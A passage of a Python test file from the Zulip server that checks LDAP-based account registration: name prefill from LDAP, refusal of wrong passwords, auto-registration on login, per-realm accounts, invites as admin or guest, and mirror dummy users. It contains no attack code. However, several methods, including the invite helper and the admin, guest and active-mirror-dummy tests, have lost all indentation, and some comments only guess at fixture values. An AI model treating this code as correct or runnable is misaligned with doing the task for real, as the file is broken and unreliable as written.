    def test_ldap_registration_from_confirmation(self) -> None:
        """With LDAP as the auth backend, the confirmation step prefills the
        full name from LDAP and prompts for the LDAP password rather than
        asking the user to choose a new one."""
        password = self.ldap_password("newuser")
        email = "newuser@zulip.com"
        subdomain = "zulip"
        self.init_default_ldap_database()
        ldap_user_attr_map = {'full_name': 'cn'}

        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})

        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        # Visit the confirmation link.
        from django.core.mail import outbox
        # Scan the outbox newest-first for the message to this address and
        # extract the confirmation URL from its body.
        for message in reversed(outbox):
            if email in message.to:
                confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
                confirmation_url = confirmation_link_pattern.search(
                    message.body).groups()[0]
                break
        else:
            raise AssertionError("Couldn't find a confirmation email.")

        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            result = self.client_get(confirmation_url)
            self.assertEqual(result.status_code, 200)

            # Full name should be set from LDAP
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Ignore",
                                                   from_confirmation="1",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")

            self.assert_in_success_response(["We just need you to do one last thing.",
                                             "New LDAP fullname",
                                             "newuser@zulip.com"],
                                            result)

            # Verify that the user is asked for name
            self.assert_in_success_response(['id_full_name'], result)
            # Verify that user is asked for its LDAP/Active Directory password.
            self.assert_in_success_response(['Enter your LDAP/Active Directory password.',
                                             'ldap-password'], result)
            self.assert_not_in_success_response(['id_password'], result)

            # Test the TypeError exception handler
            with patch("zproject.backends.ZulipLDAPAuthBackendBase.get_mapped_name", side_effect=TypeError):
                result = self.submit_reg_form_for_user(email,
                                                       password,
                                                       from_confirmation='1',
                                                       # Pass HTTP_HOST for the target subdomain
                                                       HTTP_HOST=subdomain + ".testserver")
            self.assert_in_success_response(["We just need you to do one last thing.",
                                             "newuser@zulip.com"],
                                            result)
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',
                                                'zproject.backends.ZulipLDAPUserPopulator',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_ldap_populate_only_registration_from_confirmation(self) -> None:
        """When LDAP only populates profiles (EmailAuthBackend handles
        authentication), the confirmation form prefills the LDAP name but
        still asks for a regular Zulip password."""
        password = self.ldap_password("newuser")
        email = "newuser@zulip.com"
        subdomain = "zulip"
        self.init_default_ldap_database()
        ldap_user_attr_map = {'full_name': 'cn'}

        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})

        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        # Visit the confirmation link.
        from django.core.mail import outbox
        # Scan the outbox newest-first for the message to this address and
        # extract the confirmation URL from its body.
        for message in reversed(outbox):
            if email in message.to:
                confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
                confirmation_url = confirmation_link_pattern.search(
                    message.body).groups()[0]
                break
        else:
            raise AssertionError("Couldn't find a confirmation email.")

        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_BIND_PASSWORD='',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
                AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
            result = self.client_get(confirmation_url)
            self.assertEqual(result.status_code, 200)

            # Full name should be set from LDAP
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Ignore",
                                                   from_confirmation="1",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")

            self.assert_in_success_response(["We just need you to do one last thing.",
                                             "New LDAP fullname",
                                             "newuser@zulip.com"],
                                            result)

            # Verify that the user is asked for name
            self.assert_in_success_response(['id_full_name'], result)
            # Verify that user is NOT asked for its LDAP/Active Directory password.
            # LDAP is not configured for authentication in this test.
            self.assert_not_in_success_response(['Enter your LDAP/Active Directory password.',
                                                 'ldap-password'], result)
            # If we were using e.g. the SAML auth backend, there
            # shouldn't be a password prompt, but since it uses the
            # EmailAuthBackend, there should be password field here.
            self.assert_in_success_response(['id_password'], result)
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_ldap_registration_end_to_end(self) -> None:
        """End-to-end signup via the LDAP auth backend: request a
        confirmation email, follow the link, check the full name is
        prefilled from LDAP, verify a wrong LDAP password blocks account
        creation, then create the account with the correct password and
        check full_name/short_name were synced from LDAP.
        """
        password = self.ldap_password("newuser")
        email = "newuser@zulip.com"
        subdomain = "zulip"
        self.init_default_ldap_database()
        ldap_user_attr_map = {'full_name': 'cn', 'short_name': 'sn'}
        full_name = 'New LDAP fullname'
        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            # Click confirmation link
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Ignore",
                                                   from_confirmation="1",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            # Full name should be set from LDAP
            self.assert_in_success_response(["We just need you to do one last thing.",
                                             full_name,
                                             "newuser@zulip.com"],
                                            result)
            # Submit the final form with the wrong password.
            result = self.submit_reg_form_for_user(email,
                                                   'wrongpassword',
                                                   full_name=full_name,
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            # Didn't create an account
            with self.assertRaises(UserProfile.DoesNotExist):
                user_profile = UserProfile.objects.get(delivery_email=email)
            # Wrong LDAP password redirects back to the login page.
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
            # Submit the final form with the correct password.
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name=full_name,
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
        user_profile = UserProfile.objects.get(delivery_email=email)
        # Name comes from form which was set by LDAP.
        self.assertEqual(user_profile.full_name, full_name)
        # Short name comes from LDAP ('sn' attribute in the test directory).
        self.assertEqual(user_profile.short_name, "shortname")
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_ldap_split_full_name_mapping(self) -> None:
        """When AUTH_LDAP_USER_ATTR_MAP maps first_name and last_name as
        separate LDAP attributes, registration joins them into a single
        full_name and derives short_name from the first name.
        """
        self.init_default_ldap_database()
        # first_name comes from 'sn' and last_name from 'cn'; the test
        # directory entry for this user presumably holds "First"/"Last" in
        # those attributes — verify against init_default_ldap_database().
        ldap_user_attr_map = {'first_name': 'sn', 'last_name': 'cn'}
        subdomain = 'zulip'
        email = 'newuser_splitname@zulip.com'
        password = self.ldap_password("newuser_splitname")
        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            # Click confirmation link
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Ignore",
                                                   from_confirmation="1",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            # Test split name mapping.
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Ignore",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
        user_profile = UserProfile.objects.get(delivery_email=email)
        # Full name is the joined "first last" pair from the split mapping.
        self.assertEqual(user_profile.full_name, "First Last")
        # Short name is the first-name half of the split mapping.
        self.assertEqual(user_profile.short_name, "First")
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_ldap_auto_registration_on_login(self) -> None:
        """The most common way for LDAP authentication to be used is with a
        server that doesn't have a terms-of-service required, in which
        case we offer a complete single-sign-on experience (where the
        user just enters their LDAP username and password, and their
        account is created if it doesn't already exist).

        This test verifies that flow.
        """
        password = self.ldap_password("newuser")
        email = "newuser@zulip.com"
        subdomain = "zulip"
        self.init_default_ldap_database()
        # Sync standard fields plus a custom profile field; the
        # custom_profile_field__ prefix routes an LDAP attribute into a
        # realm custom profile field.
        ldap_user_attr_map = {
            'full_name': 'cn',
            'short_name': 'sn',
            'custom_profile_field__phone_number': 'homePhone',
        }
        full_name = 'New LDAP fullname'
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            # A plain login auto-creates the account: no /register/ step.
            self.login_with_return(email, password,
                                   HTTP_HOST=subdomain + ".testserver")
            user_profile = UserProfile.objects.get(delivery_email=email)
            # Name comes from form which was set by LDAP.
            self.assertEqual(user_profile.full_name, full_name)
            self.assertEqual(user_profile.short_name, 'shortname')
            # Test custom profile fields are properly synced.
            phone_number_field = CustomProfileField.objects.get(realm=user_profile.realm, name='Phone number')
            phone_number_field_value = CustomProfileFieldValue.objects.get(user_profile=user_profile,
                                                                           field=phone_number_field)
            # 'a-new-number' presumably is the homePhone value in the test
            # LDAP directory — confirm against init_default_ldap_database().
            self.assertEqual(phone_number_field_value.value, 'a-new-number')
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
    def test_ldap_registration_multiple_realms(self) -> None:
        """One LDAP identity can auto-register a separate UserProfile in
        each realm it logs into (accounts are per-realm)."""
        password = self.ldap_password("newuser")
        email = "newuser@zulip.com"
        self.init_default_ldap_database()
        ldap_user_attr_map = {
            'full_name': 'cn',
            'short_name': 'sn',
        }
        # Second realm to register the same LDAP user into.
        do_create_realm('test', 'test', False)
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            subdomain = "zulip"
            self.login_with_return(email, password,
                                   HTTP_HOST=subdomain + ".testserver")
            # Raises DoesNotExist if auto-registration failed.
            user_profile = UserProfile.objects.get(
                delivery_email=email, realm=get_realm('zulip'))
            self.logout()
            # Test registration in another realm works.
            subdomain = "test"
            self.login_with_return(email, password,
                                   HTTP_HOST=subdomain + ".testserver")
            user_profile = UserProfile.objects.get(
                delivery_email=email, realm=get_realm('test'))
            self.assertEqual(user_profile.delivery_email, email)
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_ldap_registration_when_names_changes_are_disabled(self) -> None:
        """With name changes disabled, a new LDAP user's full name comes
        from the session value stashed at confirmation time, not from the
        registration form POST."""
        password = self.ldap_password("newuser")
        email = "newuser@zulip.com"
        subdomain = "zulip"
        self.init_default_ldap_database()
        ldap_user_attr_map = {'full_name': 'cn', 'short_name': 'sn'}
        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            # Click confirmation link. This will 'authenticated_full_name'
            # session variable which will be used to set the fullname of
            # the user.
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Ignore",
                                                   from_confirmation="1",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            with patch('zerver.views.registration.name_changes_disabled', return_value=True):
                result = self.submit_reg_form_for_user(email,
                                                       password,
                                                       # Pass HTTP_HOST for the target subdomain
                                                       HTTP_HOST=subdomain + ".testserver")
            user_profile = UserProfile.objects.get(delivery_email=email)
            # Name comes from LDAP session.
            self.assertEqual(user_profile.full_name, 'New LDAP fullname')
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.EmailAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_signup_with_ldap_and_email_enabled_using_email_with_ldap_append_domain(self) -> None:
        """With both LDAP and Email backends enabled and LDAP_APPEND_DOMAIN
        set, verify three cases: (1) a user present in LDAP cannot sign up
        with a non-LDAP password; (2) a user absent from LDAP but whose
        email matches LDAP_APPEND_DOMAIN is also refused; (3) an email
        outside LDAP_APPEND_DOMAIN registers normally with a
        Zulip-database password.
        """
        password = "nonldappassword"
        email = "newuser@zulip.com"
        subdomain = "zulip"
        self.init_default_ldap_database()
        ldap_user_attr_map = {'full_name': 'cn', 'short_name': 'sn'}
        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        # If the user's email is inside the LDAP directory and we just
        # have a wrong password, then we refuse to create an account
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            result = self.submit_reg_form_for_user(
                email,
                password,
                from_confirmation="1",
                # Pass HTTP_HOST for the target subdomain
                HTTP_HOST=subdomain + ".testserver")
            self.assertEqual(result.status_code, 200)
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Non-LDAP Full Name",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            self.assertEqual(result.status_code, 302)
            # We get redirected back to the login page because password was wrong
            self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
            self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
        # For the rest of the test we delete the user from ldap.
        del self.mock_ldap.directory["uid=newuser,ou=users,dc=zulip,dc=com"]
        # If the user's email is not in the LDAP directory, but fits LDAP_APPEND_DOMAIN,
        # we refuse to create the account.
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Non-LDAP Full Name",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            self.assertEqual(result.status_code, 302)
            # We get redirected back to the login page because emails matching LDAP_APPEND_DOMAIN,
            # aren't allowed to create non-ldap accounts.
            self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
            self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
        # If the email is outside of LDAP_APPEND_DOMAIN, we successfully create a non-ldap account,
        # with the password managed in the zulip database.
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='example.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            with patch('zerver.views.registration.logging.warning') as mock_warning:
                result = self.submit_reg_form_for_user(
                    email,
                    password,
                    from_confirmation="1",
                    # Pass HTTP_HOST for the target subdomain
                    HTTP_HOST=subdomain + ".testserver")
                self.assertEqual(result.status_code, 200)
                # The LDAP miss is logged but not fatal here.
                mock_warning.assert_called_once_with(
                    "New account email %s could not be found in LDAP",
                    "newuser@zulip.com",
                )
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Non-LDAP Full Name",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, "http://zulip.testserver/")
            user_profile = UserProfile.objects.get(delivery_email=email)
            # Name comes from the POST request, not LDAP
            self.assertEqual(user_profile.full_name, 'Non-LDAP Full Name')
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.EmailAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
    def test_signup_with_ldap_and_email_enabled_using_email_with_ldap_email_search(self) -> None:
        """Same as the LDAP_APPEND_DOMAIN variant above, but using
        LDAP_EMAIL_ATTR-based email search: a user found in LDAP cannot
        sign up with a non-LDAP password, while an email not found in LDAP
        registers normally with a Zulip-database password.
        """
        # If the user's email is inside the LDAP directory and we just
        # have a wrong password, then we refuse to create an account
        password = "nonldappassword"
        email = "newuser_email@zulip.com"  # belongs to user uid=newuser_with_email in the test directory
        subdomain = "zulip"
        self.init_default_ldap_database()
        ldap_user_attr_map = {'full_name': 'cn', 'short_name': 'sn'}
        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_EMAIL_ATTR='mail',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            result = self.submit_reg_form_for_user(
                email,
                password,
                from_confirmation="1",
                # Pass HTTP_HOST for the target subdomain
                HTTP_HOST=subdomain + ".testserver")
            self.assertEqual(result.status_code, 200)
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Non-LDAP Full Name",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            self.assertEqual(result.status_code, 302)
            # We get redirected back to the login page because password was wrong
            self.assertEqual(result.url, "/accounts/login/?email=newuser_email%40zulip.com")
            self.assertFalse(UserProfile.objects.filter(delivery_email=email).exists())
        # If the user's email is not in the LDAP directory , though, we
        # successfully create an account with a password in the Zulip
        # database.
        password = "nonldappassword"
        email = "nonexistent@zulip.com"
        subdomain = "zulip"
        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_EMAIL_ATTR='mail',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
        ):
            with patch('zerver.views.registration.logging.warning') as mock_warning:
                result = self.submit_reg_form_for_user(
                    email,
                    password,
                    from_confirmation="1",
                    # Pass HTTP_HOST for the target subdomain
                    HTTP_HOST=subdomain + ".testserver")
                self.assertEqual(result.status_code, 200)
                # The LDAP miss is logged but registration proceeds.
                mock_warning.assert_called_once_with(
                    "New account email %s could not be found in LDAP",
                    "nonexistent@zulip.com",
                )
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="Non-LDAP Full Name",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            self.assertEqual(result.status_code, 302)
            self.assertEqual(result.url, "http://zulip.testserver/")
            user_profile = UserProfile.objects.get(delivery_email=email)
            # Name comes from the POST request, not LDAP
            self.assertEqual(user_profile.full_name, 'Non-LDAP Full Name')
def ldap_invite_and_signup_as(self, invite_as: int, streams: Sequence[str] = ['Denmark']) -> None:
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn'}
subdomain = 'zulip'
email = 'newuser@zulip.com'
password = self.ldap_password("newuser")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Invite user.
self.login('iago')
response = self.invite(invitee_emails='newuser@zulip.com',
stream_names=streams,
invite_as=invite_as)
self.assert_json_success(response)
self.logout()
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.EmailAuthBackend'))
def test_ldap_invite_user_as_admin(self) -> None:
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS['REALM_ADMIN'])
user_profile = UserProfile.objects.get(
delivery_email=self.nonreg_email('newuser'))
self.assertTrue(user_profile.is_realm_admin)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.EmailAuthBackend'))
def test_ldap_invite_user_as_guest(self) -> None:
self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS['GUEST_USER'])
user_profile = UserProfile.objects.get(
delivery_email=self.nonreg_email('newuser'))
self.assertTrue(user_profile.is_guest)
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.EmailAuthBackend'))
    def test_ldap_invite_streams(self) -> None:
        """Streams named in the invitation are subscribed on LDAP signup,
        even when they are not default streams for the realm."""
        stream_name = 'Rome'
        realm = get_realm('zulip')
        stream = get_stream(stream_name, realm)
        # Sanity check: 'Rome' must not be a default stream, so any
        # subscription we find below came from the invitation.
        default_streams = get_default_streams_for_realm(realm)
        default_streams_name = [stream.name for stream in default_streams]
        self.assertNotIn(stream_name, default_streams_name)
        # Invite user.
        self.ldap_invite_and_signup_as(PreregistrationUser.INVITE_AS['REALM_ADMIN'], streams=[stream_name])
        user_profile = UserProfile.objects.get(delivery_email=self.nonreg_email('newuser'))
        self.assertTrue(user_profile.is_realm_admin)
        # Exactly one subscription to the invited stream.
        sub = get_stream_subscriptions_for_user(user_profile).filter(recipient__type_id=stream.id)
        self.assertEqual(len(sub), 1)
    def test_registration_when_name_changes_are_disabled(self) -> None:
        """
        Test `name_changes_disabled` when we are not running under LDAP.
        """
        password = self.ldap_password("newuser")
        email = "newuser@zulip.com"
        subdomain = "zulip"
        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        # Without an LDAP session, name_changes_disabled has no stashed
        # name to fall back on, so the submitted name is used.
        with patch('zerver.views.registration.name_changes_disabled', return_value=True):
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   full_name="New Name",
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
        user_profile = UserProfile.objects.get(delivery_email=email)
        # 'New Name' comes from POST data; not from LDAP session.
        self.assertEqual(user_profile.full_name, 'New Name')
    def test_realm_creation_through_ldap(self) -> None:
        """Realm creation via an LDAP-authenticated confirmation link:
        after flipping the PreregistrationUser to realm_creation, the
        final registration page (with realm fields) renders successfully."""
        password = self.ldap_password("newuser")
        email = "newuser@zulip.com"
        subdomain = "zulip"
        realm_name = "Zulip"
        self.init_default_ldap_database()
        ldap_user_attr_map = {'full_name': 'cn'}
        with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
            result = self.client_post('/register/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)
        # Visit the confirmation link.
        from django.core.mail import outbox
        for message in reversed(outbox):
            if email in message.to:
                confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
                confirmation_url = confirmation_link_pattern.search(
                    message.body).groups()[0]
                break
        else:
            raise AssertionError("Couldn't find a confirmation email.")
        with self.settings(
                POPULATE_PROFILE_VIA_LDAP=True,
                LDAP_APPEND_DOMAIN='zulip.com',
                AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
                AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',),
                TERMS_OF_SERVICE=False,
        ):
            result = self.client_get(confirmation_url)
            self.assertEqual(result.status_code, 200)
            # Flip the prereg user into a realm-creation one so the final
            # form renders the realm name/subdomain fields.
            key = find_key_by_email(email)
            confirmation = Confirmation.objects.get(confirmation_key=key)
            prereg_user = confirmation.content_object
            prereg_user.realm_creation = True
            prereg_user.save()
            result = self.submit_reg_form_for_user(email,
                                                   password,
                                                   realm_name=realm_name,
                                                   realm_subdomain=subdomain,
                                                   from_confirmation='1',
                                                   # Pass HTTP_HOST for the target subdomain
                                                   HTTP_HOST=subdomain + ".testserver")
            self.assert_in_success_response(["We just need you to do one last thing.",
                                             "newuser@zulip.com"],
                                            result)
    @patch('DNS.dnslookup', return_value=[['sipbtest:*:20922:101:Fred Sipb,,,:/mit/sipbtest:/bin/athena/tcsh']])
    def test_registration_of_mirror_dummy_user(self, ignored: Any) -> None:
        """A mirror dummy user (pre-created, inactive) can claim their
        account through /register/; attempting the final form while the
        dummy is already active is an invalid state and must raise.
        The DNS.dnslookup patch fakes the MIT Hesiod lookup used for
        zephyr-realm users."""
        password = "test"
        subdomain = "zephyr"
        user_profile = self.mit_user("sipbtest")
        email = user_profile.delivery_email
        # Put the user into the mirror-dummy (inactive placeholder) state.
        user_profile.is_mirror_dummy = True
        user_profile.is_active = False
        user_profile.save()
        result = self.client_post('/register/', {'email': email}, subdomain="zephyr")
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"], subdomain="zephyr")
        self.assert_in_response("Check your email so we can get started.", result)
        # Visit the confirmation link.
        from django.core.mail import outbox
        for message in reversed(outbox):
            if email in message.to:
                confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
                confirmation_url = confirmation_link_pattern.search(
                    message.body).groups()[0]
                break
        else:
            raise AssertionError("Couldn't find a confirmation email.")
        result = self.client_get(confirmation_url, subdomain="zephyr")
        self.assertEqual(result.status_code, 200)
        # If the mirror dummy user is already active, attempting to
        # submit the registration form should raise an AssertionError
        # (this is an invalid state, so it's a bug we got here):
        user_profile.is_active = True
        user_profile.save()
        with self.assertRaisesRegex(AssertionError, "Mirror dummy user is already active!"):
            result = self.submit_reg_form_for_user(
                email,
                password,
                from_confirmation='1',
                # Pass HTTP_HOST for the target subdomain
                HTTP_HOST=subdomain + ".testserver")
        # Restore the valid (inactive) state and complete registration.
        user_profile.is_active = False
        user_profile.save()
        result = self.submit_reg_form_for_user(email,
                                               password,
                                               from_confirmation='1',
                                               # Pass HTTP_HOST for the target subdomain
                                               HTTP_HOST=subdomain + ".testserver")
        self.assertEqual(result.status_code, 200)
        result = self.submit_reg_form_for_user(email,
                                               password,
                                               # Pass HTTP_HOST for the target subdomain
                                               HTTP_HOST=subdomain + ".testserver")
        self.assertEqual(result.status_code, 302)
        # The claimed account is now logged in.
        self.assert_logged_in_user_id(user_profile.id)
def test_registration_of_active_mirror_dummy_user(self) -> None:
"""
Trying to activate an already-active mirror dummy user should
raise an AssertionError.
"""
user_profile = self.mit_user("sipbtest")
email = user_profile.delivery_email
user_profile.is_mirror_dummy = True
user_profile.is_active = True
user_profile.save()
with self.assertRaisesRegex(AssertionError, "Mirror dummy user is already active!"):
self.client_post('/register/', {'email': email}, subdomain="zephyr")
    @override_settings(TERMS_OF_SERVICE=False)
    def test_dev_user_registration(self) -> None:
        """Verify that /devtools/register_user creates a new user, logs them
        in, and redirects to the logged-in app."""
        count = UserProfile.objects.count()
        # The dev endpoint is expected to name the new user
        # user-<N>@zulip.com, where N is the pre-existing user count.
        email = f"user-{count}@zulip.com"
        result = self.client_post('/devtools/register_user/')
        # The newest UserProfile (highest id) is the one just created.
        user_profile = UserProfile.objects.all().order_by("id").last()
        self.assertEqual(result.status_code, 302)
        self.assertEqual(user_profile.delivery_email, email)
        self.assertEqual(result['Location'], "http://zulip.testserver/")
        self.assert_logged_in_user_id(user_profile.id)
    @override_settings(TERMS_OF_SERVICE=False)
    def test_dev_user_registration_create_realm(self) -> None:
        """/devtools/register_realm creates a realm on a realm-<N>
